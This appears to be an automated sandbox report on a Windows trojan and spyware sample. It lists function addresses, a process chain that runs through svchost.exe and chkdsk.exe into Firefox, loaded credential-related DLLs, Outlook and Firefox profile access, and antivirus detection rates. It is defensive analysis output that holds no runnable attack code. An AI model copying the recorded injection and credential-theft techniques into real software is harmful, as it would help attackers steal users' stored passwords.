Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0588B1B0	5_2_0588B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B516C	5_2_058B516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0586F172	5_2_0586F172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0594B16B	5_2_0594B16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058870C0	5_2_058870C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0592F0CC	5_2_0592F0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593F0E0	5_2_0593F0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059370E9	5_2_059370E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058C739A	5_2_058C739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593132D	5_2_0593132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0586D34C	5_2_0586D34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058852A0	5_2_058852A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589B2C0	5_2_0589B2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059212ED	5_2_059212ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589FDC0	5_2_0589FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05883D40	5_2_05883D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05931D5A	5_2_05931D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05937D73	5_2_05937D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593FCF2	5_2_0593FCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058F9C32	5_2_058F9C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05881F92	5_2_05881F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593FFB1	5_2_0593FFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05843FD5	5_2_05843FD5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05843FD2	5_2_05843FD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593FF09	5_2_0593FF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05889EB0	5_2_05889EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05915910	5_2_05915910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05889950	5_2_05889950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589B950	5_2_0589B950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058838E0	5_2_058838E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058ED800	5_2_058ED800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589FB80	5_2_0589FB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058BDBF9	5_2_058BDBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058F5BF0	5_2_058F5BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593FB76	5_2_0593FB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058C5AA0	5_2_058C5AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05921AA3	5_2_05921AA3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0591DAAC	5_2_0591DAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0592DAC6	5_2_0592DAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05937A46	5_2_05937A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593FA49	5_2_0593FA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058F3A6C	5_2_058F3A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05091C20	5_2_05091C20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0508AD20	5_2_0508AD20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0508CD40	5_2_0508CD40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0508AE64	5_2_0508AE64
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0508AE70	5_2_0508AE70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0508CB20	5_2_0508CB20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050934F0	5_2_050934F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050952E0	5_2_050952E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050ABAC0	5_2_050ABAC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573E465	5_2_0573E465
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573E7FC	5_2_0573E7FC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573E31C	5_2_0573E31C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573D8C8	5_2_0573D8C8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573CB68	5_2_0573CB68

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0586B970 appears 280 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 058B5130 appears 58 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 058FF290 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 058EEA12 appears 86 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 058C7E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 103 times
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: String function: 00A2EC2F appears 68 times
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: String function: 00A36AC0 appears 42 times
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: String function: 00A3F8A0 appears 35 times

Source: bIcqeSVPW6.exe, 00000000.00000003.1478060326.0000000003653000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bIcqeSVPW6.exe
Source: bIcqeSVPW6.exe, 00000000.00000003.1480854104.00000000037FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bIcqeSVPW6.exe

Source: bIcqeSVPW6.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/10

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A5CE7A GetLastError,FormatMessageW,

0_2_00A5CE7A

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00A4AB84
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00A4B134

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A5E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00A5E1FD

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A56532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00A56532

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A6C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00A6C18C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A1406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00A1406B

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

File created: C:\Users\user\AppData\Local\Temp\autC43F.tmp

Jump to behavior

Source: bIcqeSVPW6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chkdsk.exe, 00000005.00000003.1893837476.0000000005480000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1890459262.0000000005476000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.0000000005476000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.00000000054A2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: bIcqeSVPW6.exe	ReversingLabs: Detection: 83%
Source: bIcqeSVPW6.exe	Virustotal: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\bIcqeSVPW6.exe "C:\Users\user\Desktop\bIcqeSVPW6.exe"
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bIcqeSVPW6.exe"
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bIcqeSVPW6.exe"	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: bIcqeSVPW6.exe

Static file information: File size 1224192 > 1048576

Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bIcqeSVPW6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: bIcqeSVPW6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: svchost.exe, 00000002.00000003.1669406047.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703039846.0000000002A00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qcjVHvcmgHQ.exe, 00000004.00000002.3318882784.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: chkdsk.pdb source: svchost.exe, 00000002.00000003.1669406047.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703039846.0000000002A00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: bIcqeSVPW6.exe, 00000000.00000003.1478411296.0000000003530000.00000004.00001000.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000003.1477043674.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606254379.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1604144030.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1705453958.000000000569A000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.00000000059DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.0000000005840000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1702372197.00000000054E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bIcqeSVPW6.exe, 00000000.00000003.1478411296.0000000003530000.00000004.00001000.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000003.1477043674.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1703230885.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606254379.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1604144030.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000005.00000003.1705453958.000000000569A000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.00000000059DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.0000000005840000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1702372197.00000000054E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.000000000488C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000005E6C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.00000000053F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2002761848.000000003A07C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.000000000488C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000005E6C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.00000000053F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2002761848.000000003A07C000.00000004.80000000.00040000.00000000.sdmp

Source: bIcqeSVPW6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bIcqeSVPW6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bIcqeSVPW6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bIcqeSVPW6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bIcqeSVPW6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A2E01E LoadLibraryA,GetProcAddress,

0_2_00A2E01E

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A36B05 push ecx; ret	0_2_00A36B18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E48BB push ss; iretd	2_2_004E4935
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E4908 push ss; iretd	2_2_004E4935
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EE9F3 push esp; retf	2_2_004EE9FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E2266 push ebp; ret	2_2_004E2279
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EAB53 push esi; iretd	2_2_004EAB5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D3370 push eax; ret	2_2_004D3372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E43B4 push 0000002Eh; iretd	2_2_004E43C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D1C30 push ebx; retf 0C0Eh	2_2_004D1D35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EECF3 push edx; retf	2_2_004EED2D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EEC99 push edx; retf	2_2_004EED2D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EA62E push edi; iretd	2_2_004EA63E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004EA633 push edi; iretd	2_2_004EA63E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E16FA push esp; iretd	2_2_004E170C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E1703 push esp; iretd	2_2_004E170C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D1730 push ebx; retf	2_2_004D1731
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300225F pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030027FA pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300283D push eax; iretd	2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300135E push eax; iretd	2_2_03001369
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE0E51 push 0000002Eh; iretd	4_2_06CE0E61
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE263A push esp; ret	4_2_06CE263B
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CEB790 push edx; retf	4_2_06CEB7CA
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CEB736 push edx; retf	4_2_06CEB7CA
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CEB490 push esp; retf	4_2_06CEB49B
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE75F0 push esi; iretd	4_2_06CE75F7
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDED03 push ebp; ret	4_2_06CDED16
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE13A5 push ss; iretd	4_2_06CE13D2
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE1358 push ss; iretd	4_2_06CE13D2
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE70CB push edi; iretd	4_2_06CE70DB

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A78111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A78111
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A2EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00A2EB42

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A3123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00A3123A

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
